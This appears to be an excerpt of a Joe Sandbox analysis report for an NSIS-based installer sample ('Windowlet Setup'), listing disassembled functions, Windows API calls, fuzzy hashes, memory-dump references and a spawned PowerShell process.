Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D

Function 0040496B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
wsprintfW.USER32 ref: 00404A15
SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28

Strings

%u.%u%s%s, xrefs: 004049F6

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9

Function 00403B6F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(00000000,Windowlet Setup), ref: 00403C07

Strings

Windowlet Setup, xrefs: 00403BF6
1033, xrefs: 00403B73, 00403B7D, 00403BEE
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00403B70

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$1033$Windowlet Setup
API String ID: 530164218-867710217
Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98

Function 00402537 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll,?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll, xrefs: 00402552, 00402575, 00402589, 004025D5

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll
API String ID: 3109718747-3636328232
Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E

Function 00405A04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
lstrcatW.KERNEL32(?,0040A014), ref: 00405A26

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE

Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C

Function 00405B0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Windowlet Setup,NSIS Error), ref: 0040605D

Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA

lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E

Function 00405123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405152
CallWindowProcW.USER32(?,?,?,?), ref: 004051A3

Part of subcall function 00404160: SendMessageW.USER32(00010488,00000000,00000000,00000000), ref: 00404172

Strings

, xrefs: 00405133

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A

Function 00403804 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
GlobalFree.KERNEL32(?), ref: 00403825

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403804

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8

Function 00405A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4Vx2rUlb0f.exe,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405A56
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4Vx2rUlb0f.exe,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405A66

Strings

C:\Users\user\Desktop, xrefs: 00405A50

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD

Function 00405B8A Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8

Analysis Process: powershell.exePID: 7576, Parent PID: 7544COMMON

Executed Functions

Function 047FA980 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2691060002.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a48ccbe6b37b924edfab29354b527193f2e085edb84c71379575ae222812f214
Instruction ID: 4db19a19eebc6e4321d4e9165d9038cde41c9e6df99da6a7fce077f2ebc83c08
